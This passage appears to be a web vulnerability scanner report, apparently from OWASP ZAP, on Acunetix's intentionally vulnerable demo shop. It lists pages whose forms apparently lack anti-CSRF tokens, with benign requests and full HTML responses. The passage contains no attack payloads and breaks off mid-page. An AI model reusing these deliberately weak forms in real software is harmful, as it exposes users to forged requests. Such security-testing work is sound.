Evidence | <form name="form1" method="post" action="/secured/newuser.php"> |
Request Header - size: 271 bytes. |
GET http://testphp.vulnweb.com/signup.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/login.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6033 |
Response Body - size: 6,033 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>signup</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <h2 id="pageName">Signup new user</h2> <h4>Please do not enter real information here.</h4> <h4>If you press the submit button you will be transferred to asecured connection.</h4> <form name="form1" method="post" action="/secured/newuser.php"> <table border="0" cellspacing="1" cellpadding="4"> <tr><td valign="top">Username:</td><td><input type="text" name="uuname" style="width:200px"></td></tr> <tr><td valign="top">Password:</td><td><input type="password" name="upass" style="width:200px"></td></tr> <tr><td valign="top">Retype password:</td><td><input type="password" name="upass2" style="width:200px"></td></tr> <tr><td valign="top">Name:</td><td><input type="text" name="urname" style="width:200px"></td></tr> <tr><td valign="top">Credit card number:</td><td><input type="text" name="ucc" style="width:200px"></td></tr> <tr><td valign="top">E-Mail:</td><td><input type="text" name="uemail" style="width:200px"></td></tr> <tr><td valign="top">Phone number:</td><td><input type="text" name="uphone" style="width:200px"></td></tr> <tr><td valign="top">Address:</td><td><textarea wrap="soft" name="uaddress" rows="5" style="width:200px"></textarea></td></tr> <tr><td colspan="2" align="right"><input type="submit" value="signup" name="signup"></td></tr> </table> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/signup.php |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 271 bytes. |
GET http://testphp.vulnweb.com/signup.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/login.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6033 |
Response Body - size: 6,033 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>signup</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <h2 id="pageName">Signup new user</h2> <h4>Please do not enter real information here.</h4> <h4>If you press the submit button you will be transferred to asecured connection.</h4> <form name="form1" method="post" action="/secured/newuser.php"> <table border="0" cellspacing="1" cellpadding="4"> <tr><td valign="top">Username:</td><td><input type="text" name="uuname" style="width:200px"></td></tr> <tr><td valign="top">Password:</td><td><input type="password" name="upass" style="width:200px"></td></tr> <tr><td valign="top">Retype password:</td><td><input type="password" name="upass2" style="width:200px"></td></tr> <tr><td valign="top">Name:</td><td><input type="text" name="urname" style="width:200px"></td></tr> <tr><td valign="top">Credit card number:</td><td><input type="text" name="ucc" style="width:200px"></td></tr> <tr><td valign="top">E-Mail:</td><td><input type="text" name="uemail" style="width:200px"></td></tr> <tr><td valign="top">Phone number:</td><td><input type="text" name="uphone" style="width:200px"></td></tr> <tr><td valign="top">Address:</td><td><textarea wrap="soft" name="uaddress" rows="5" style="width:200px"></textarea></td></tr> <tr><td colspan="2" align="right"><input type="submit" value="signup" name="signup"></td></tr> </table> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/cart.php |
Method | POST |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 347 bytes. |
POST http://testphp.vulnweb.com/cart.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com/product.php?pic=1 Content-Length: 19 |
Request Body - size: 19 bytes. |
price=500&addcart=1
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:21 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4903 |
Response Body - size: 4,903 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>you cart</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Error</h2> <div class='story'> <p>You are not logged on. To log on please visit our <a href='login.php'>login page</a></p> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/guestbook.php |
Method | POST |
Parameter | |
Attack | |
Evidence | <form action="" method="post" name="faddentry"> |
Request Header - size: 348 bytes. |
POST http://testphp.vulnweb.com/guestbook.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com/guestbook.php Content-Length: 33 |
Request Body - size: 33 bytes. |
name=ZAP&text=&submit=add+message
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5393 |
Response Body - size: 5,393 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>guestbook</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong>ZAP</strong></td><td align="right" style="background-color:#F5F5F5">12.13.2022, 4:16 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif"> </td></tr></table> </div> <div class="story"> <form action="" method="post" name="faddentry"> <input type="hidden" name="name" value="anonymous user"> <textarea name="text" rows="5" wrap="VIRTUAL" style="width:500px;"></textarea> <br> <input type="submit" name="submit" value="add message"> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/guestbook.php |
Method | POST |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 348 bytes. |
POST http://testphp.vulnweb.com/guestbook.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com/guestbook.php Content-Length: 33 |
Request Body - size: 33 bytes. |
name=ZAP&text=&submit=add+message
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:57 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5393 |
Response Body - size: 5,393 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>guestbook</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong>ZAP</strong></td><td align="right" style="background-color:#F5F5F5">12.13.2022, 4:16 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif"> </td></tr></table> </div> <div class="story"> <form action="" method="post" name="faddentry"> <input type="hidden" name="name" value="anonymous user"> <textarea name="text" rows="5" wrap="VIRTUAL" style="width:500px;"></textarea> <br> <input type="submit" name="submit" value="add message"> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/search.php?test=query |
Method | POST |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 342 bytes. |
POST http://testphp.vulnweb.com/search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Content-Length: 25 |
Request Body - size: 25 bytes. |
searchFor=ZAP&goButton=go
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:51 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4772 |
Response Body - size: 4,772 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>search</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table 